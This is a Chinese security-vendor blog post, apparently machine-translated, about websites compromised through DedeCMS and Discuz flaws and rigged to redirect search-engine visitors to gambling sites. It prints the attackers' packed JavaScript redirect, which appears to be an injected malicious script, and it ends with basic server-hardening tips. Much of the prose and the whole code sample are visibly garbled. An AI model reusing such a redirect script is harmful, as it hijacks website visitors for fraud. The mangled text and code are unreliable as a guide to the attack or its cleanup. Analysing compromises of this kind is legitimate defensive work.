最近，我们的SINE安全公司连接到数十家公司网站被跳到了彩票，赌博网站，客户从百度搜索网站反映，直接跳到彩票网站，直接输入的网址没有跳转，导致流量客户网站的数量急剧下降。百度推广和搜狗推广已在彩票网站上做广告。公司领导高度重视网站的安全性，因为公司的形象和声誉损失太大。我们安排安全。技术人员在他们的网站上进行全面的网站安全测试，对网站的后门，木马后门和安全加固进行全面的删除和错误修复。关于网站被跳到彩票和赌博网站的问题，组织了一个详细的过程，希望能够帮助更多的网站管理员和公司网站运营商。

网站被跳转彩票网站问题分析

我们的SINE安全性具有公司网站所有者的详细服务器信息（服务器IP远程端口管理员帐户密码，SSH端口，root帐户密码）。网站信息包括FTP帐户密码连接，以及安全部署部门技术的网站代码。并且服务器系统执行细致的安全检测和分析。

在整体安全测试中，我们发现客户端的网站有一个网站木马后门，包括php脚本木马，asp脚本木马，jsp脚本木马，我们通常拨打马来西亚，可以恶意篡改网站，上传，重命名，下载等。管理员的高权限操作。网站被跳的网站，使用的网站架构是php + mysql架构，以及jsp + mysql架构。他们中的大多数使用开源程序，如dedecms，编织梦系统，phpcms系统，discuz系统。

由于客户网站一直跳到彩票和赌博网站，客户只知道一些简单的代码，只能通过篡改主页代码找到恶意代码删除它，但姑息不是治愈，网站一直在跳跃，客户经常担心这些问题，每天都在担心。事实上，问题的根本原因在于网站存在漏洞和服务器安全性不足。我们的SINE处理了数千个网站。在经验方面，该网站最有可能被篡改。它是篡改主页的标题，描述它，并在主页顶部添加一些加密的字符，如下所示：/p>

北京赛车投注平台_北京赛车pk10在线账号_北京赛车pk10登陆平台

上面的代码是攻击者添加的加密标题和描述。解密后，发现内容是赌博内容，如北京赛车，PK10等。受到攻击的另一个功能是您可以在首页找到跳转代码。该代码基于搜索引擎的特征来判断跳转。例如，确定客户的访问权限是通过百度搜索，360搜索，搜狗搜索。来的那些将直接跳到彩票并进入赌博网站。以下代码：

Type='text/java'> eval（function（p，a，c，k，e，d）{e=function（c）{return（c35？String.fromCharCode（c + 29）: c.toString（ 36））};如果（ '' 取代（/^ /，字符串））{而（C - ）d [E（C）]=K [C] || E（c）中;！。K=[功能（e）{retun d [e]}]; e=function（）{return'\ w +'}; c=1;}; while（c - ）if（k [c]）p=p.replace（新的RegExp（'\ b'+ e（c）+'\ b'，'g'），k [c]）;返回p;}（'l ['\ e \ c \ 1 \ m \ i \ 8 \ n \ 0 '] [' \ 7 \ 4 \ 9 \ 0 \ 8 ']（' \ħ\ 2 \ 1 \ 4 \ 9 \ 3 \ 0 \ 0 \Ĵ\ 3 \ 8 \ d \ 6 \ 0 \ 8 \ķ\ 0 \ 5 \˚F\一个\ r \一个\ 2 \ 1 \ 4 \ 9 \ 3 \ 0 \ 6 \ 2 \ 4 \ 1 \ d \ 6 \ S \ 0 \ 0 \ 3 \ 2 \ q \ 5 \ 5 \ 7 \ 7 \ 7 \ b \ 1 \ 3。\ E \一个\ 2 \ p \ b \ 1 \ C \ I \ 5 \Ĵ\ o \ 1 \ b \˚F\ 2 \ 6 \克\ħ\ 5 \ 2 \ 1 \ 4 \ 9 \ 3 \ 0 \克 '）;'，29,29'X74 | X63 | X73 | X70 | X72 | X2F | X22 | X77 | X65 | X69 | X61 | X2E | x6f | X3D | 64 | X6A | x3e | X3C | X6D | X79 | X78 |窗口| X75 | x6e | X6C | X38 | X3A | X76 | x68'.split（ '|'），0，{} ））

跳转到的彩票网站截图如下：

另一个攻击特征是网站在百度搜索并出现红色风险标志。百度URL安全中心提醒您，该网站可能会被黑客攻击，并且某些页面被非法篡改！红色提示百度风险。领先客户打开直接被百度拦截的网站，如下图所示：

百度URL安全中心提醒您：

该网站可能被黑客入侵，一些网页被非法篡改！查看详细信息

您正在访问：http ******* com/

该网站可能被黑客入侵，一些网页被非法篡改，这可能会威胁到您的财产和信息安全。建议您谨慎访问它。

对于网站上的非法篡改页面（****** .com），请参考以下示例：

被黑客攻击的URL快照1：******** com/011E ...

黑客URL快照2：******** com/010S ...

黑客URL快照3：******** com/004G ...

针对上述网站受到攻击的特点，我们进行了全面的手动代码安全审核，网站漏洞检测，网站木马后门清理，dedecms网站发现sql注入漏洞，xss获取管理员帐户cookie漏洞， discuz有gethell漏洞，注入获取管理员漏洞，discuz上传绕过漏洞，我们全面修复了上述漏洞，并做了网站安全部署，以及服务器安全部署，网站文件防篡改部署。

防止网站被跳转的解决方法如下：

1.安全部署服务器目录权限，加密管理员帐户密码，尽可能设置数字+大写和小写字母+特殊符号，并将普通权限帐户分配给网站数据库。

2.mysql数据库默认端口3306，更改为61116，并添加到端口安全策略，不对外开放，外部网络IP无法连接到数据库，只有本地127.0.0.1可以连接到数据库到防止攻击者恶意猜测。

3.服务器底层系统的安全加固，包括远程端口登录的安全验证。

4.对网站代码执行全面的安全检查，包括定期升级网站源代码，修复程序和网站漏洞。